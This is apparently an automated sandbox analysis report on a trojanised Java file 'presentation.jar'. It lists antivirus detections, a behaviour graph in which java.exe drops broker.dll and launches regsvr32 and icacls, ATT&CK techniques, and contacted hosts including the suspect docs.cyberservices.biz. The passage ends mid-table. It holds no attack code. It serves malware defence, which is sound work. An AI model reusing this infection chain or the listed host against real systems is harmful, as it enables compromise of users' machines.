        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobServices File Permissions Weakness1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 406076 Sample: presentation.jar Startdate: 06/05/2021 Architecture: WINDOWS Score: 80 42 Found malware configuration 2->42 44 Multi AV Scanner detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 8 cmd.exe 2 2->8         started        process3 process4 10 java.exe 1 35 8->10         started        14 conhost.exe 8->14         started        dnsIp5 38 docs.cyberservices.biz 50.87.249.219, 443, 49735 UNIFIEDLAYER-AS-1US United States 10->38 40 192.168.2.1 unknown unknown 10->40 28 C:\Users\user\AppData\Local\broker.dll, PE32 10->28 dropped 16 iexplore.exe 3 86 10->16         started        19 icacls.exe 1 10->19         started        21 regsvr32.exe 10->21         started        file6 process7 dnsIp8 30 www.java.com 16->30 23 iexplore.exe 9 101 16->23         started        26 conhost.exe 19->26         started        process9 dnsIp10 32 prefmgr-cookie.truste-svc.net 34.202.206.65, 443, 49736, 49737 AMAZON-AESUS United States 23->32 34 consent-pref.trustarc.com 143.204.209.31, 443, 49728, 49729 AMAZON-02US United States 23->34 36 18 other IPs or domains 23->36

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        presentation.jar20%VirustotalBrowse
        presentation.jar9%MetadefenderBrowse
        presentation.jar41%ReversingLabsByteCode-JAVA.Trojan.Tnega

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\broker.dll9%MetadefenderBrowse
        C:\Users\user\AppData\Local\broker.dll28%ReversingLabsWin32.Trojan.Johnnie

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        10.2.regsvr32.exe.3200000.1.unpack100%AviraHEUR/AGEN.1108168Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        https://s2.go-mpulse.net/boomerang/0%URL Reputationsafe
        https://s2.go-mpulse.net/boomerang/0%URL Reputationsafe
        https://s2.go-mpulse.net/boomerang/0%URL Reputationsafe
        http://www.chambersign.org10%URL Reputationsafe
        http://www.chambersign.org10%URL Reputationsafe
        http://www.chambersign.org10%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://policy.camerfirma.com00%URL Reputationsafe
        http://policy.camerfirma.com00%URL Reputationsafe
        http://policy.camerfirma.com00%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://cps.letsencrypt.org00%URL Reputationsafe
        http://cps.letsencrypt.org00%URL Reputationsafe
        http://cps.letsencrypt.org00%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
        http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
        http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
        http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
        http://bugreport.sun.com/bugreport/0%Avira URL Cloudsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://buscar.ozu.es/0%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://ocsp.sectigo.com0%URL Reputationsafe
        http://ocsp.sectigo.com0%URL Reputationsafe
        http://ocsp.sectigo.com0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
        http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
        http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
        http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
        http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
        http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
        http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
        http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://r3.o.lencr.org0%Avira URL Cloudsafe
        http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://www.gmarket.co.kr/0%URL Reputationsafe
        http://www.gmarket.co.kr/0%URL Reputationsafe
        http://www.gmarket.co.kr/0%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://searchresults.news.com.au/0%URL Reputationsafe
        http://searchresults.news.com.au/0%URL Reputationsafe
        http://searchresults.news.com.au/0%URL Reputationsafe
        http://www.asharqalawsat.com/0%URL Reputationsafe
        http://www.asharqalawsat.com/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        consent-pref.trustarc.com
        143.204.209.31
        truefalse
          high
          consent-st.trustarc.com
          143.204.209.88
          truefalse
            high
            oracle.112.2o7.net
            35.181.18.61
            truefalse
              high
              docs.cyberservices.biz
              50.87.249.219
              truefalse
                unknown
                prefmgr-cookie.truste-svc.net
                34.202.206.65
                truefalse
                  high
                  consent.trustarc.com
                  143.204.209.41
                  truefalse
                    high
                    static.oracle.com
                    unknown
                    unknownfalse
                      high
                      www.oracle.com
                      unknown
                      unknownfalse
                        high
                        s.go-mpulse.net
                        unknown
                        unknownfalse
                          unknown
                          trial-eum-clienttons-s.akamaihd.net
                          unknown
                          unknownfalse
                            high
                            c.oracleinfinity.io
                            unknown
                            unknownfalse
                              unknown
                              84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net
                              unknown
                              unknownfalse
                                high
                                685d5b19.akstat.io
                                unknown
                                unknownfalse
                                  unknown
                                  trial-eum-clientnsv4-s.akamaihd.net
                                  unknown
                                  unknownfalse
                                    high
                                    www.java.com
                                    unknown
                                    unknownfalse
                                      high
                                      c.go-mpulse.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        dc.oracleinfinity.io
                                        unknown
                                        unknownfalse
                                          unknown
                                          kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.net
                                          unknown
                                          unknownfalse
                                            high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://search.chol.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.mercadolivre.com.br/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.merlin.com.pl/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://search.ebay.de/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.mtv.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.rambler.ru/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.nifty.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.dailymail.co.uk/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www3.fnac.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://s2.go-mpulse.net/boomerang/~DF9F66EA97E71930AD.TMP.7.dr, en[1].htm.8.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://buscar.ya.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://search.yahoo.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.chambersign.org1java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://repository.swisssign.com/0java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.sogou.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://asp.usatoday.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://consent.trustarc.com/bannermsg?notice[1].js0.8.drfalse
                                                                    high
                                                                    http://fr.search.yahoo.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://rover.ebay.comjava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.aboutads.info/consumersget[1].js.8.drfalse
                                                                          high
                                                                          http://in.search.yahoo.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://img.shopzilla.com/shopzilla/shopzilla.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://search.ebay.in/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                http://image.excite.co.jp/jp/favicon/lep.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://%s.comjava.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                low
                                                                                http://msk.afisha.ru/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trust~DF9F66EA97E71930AD.TMP.7.drfalse
                                                                                    high
                                                                                    http://www.reddit.com/msapplication.xml4.7.drfalse
                                                                                      high
                                                                                      http://busca.igbusca.com.br//app/static/images/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://watchdog.truste.com/pvr.php?page=complaintget[1].js.8.drfalse
                                                                                        high
                                                                                        http://policy.camerfirma.com0java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://search.rediff.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js~DF9F66EA97E71930AD.TMP.7.drfalse
                                                                                            high
                                                                                            http://www.ya.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://bugs.webkit.org/show_bug.cgi?id=38100D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm.8.drfalse
                                                                                                high
                                                                                                http://www.etmall.com.tw/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://it.search.dada.net/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://search.naver.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.google.ru/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://cps.letsencrypt.org0java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://search.hanafos.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://cgi.search.biglobe.ne.jp/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.certplus.com/CRL/class2.crljava.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.251400043.000000000A1C5000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.abril.com.br/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://search.daum.net/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://java.oracle.com/java.exe, 00000002.00000002.251436069.000000000A1D5000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://search.naver.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.msn.co.jp/results.aspx?q=java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.clarin.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://buscar.ozu.es/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sjava.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSAfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://kr.search.yahoo.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://search.about.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://ocsp.sectigo.comjava.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://busca.igbusca.com.br/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityjava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.ask.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.priceminister.com/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://cps.chambersign.org/cps/chambersroot.htmljava.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.cjmall.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://search.centrum.cz/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.certplus.com/CRL/class3P.crljava.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://suche.t-online.de/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.google.it/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.auction.co.kr/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.ceneo.pl/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.amazon.de/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://crl.securetrust.com/STCA.crljava.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://sads.myspace.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com~DF9F66EA97E71930AD.TMP.7.drfalse
                                                                                                                                      high
                                                                                                                                      http://busca.buscape.com.br/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.pchome.com.tw/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://browse.guardian.co.uk/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://google.pchome.com.tw/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.rambler.ru/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://consent.trustarc.com/lognotice[1].js0.8.drfalse
                                                                                                                                            high
                                                                                                                                            http://uk.search.yahoo.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://espanol.search.yahoo.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://r3.o.lencr.orgjava.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp, java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.ozu.es/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.sify.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://openimage.interpark.com/interpark.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.yahoo.co.jp/favicon.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://search.ebay.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.gmarket.co.kr/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://ocsp.sectigo.com0java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSAfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.nifty.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://searchresults.news.com.au/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.google.si/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.google.cz/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.soso.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.univision.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://search.ebay.it/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.amazon.com/msapplication.xml.7.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icojava.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/requirejs/requirejs/blob/master/LICENSErenderer[1].js.8.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.asharqalawsat.com/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://busca.orange.es/java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpfalse
                                                                                                                                                                          high

                                                                                                                                                                          Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          143.204.209.41
                                                                                                                                                                          consent.trustarc.comUnited States
                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                          143.204.209.31
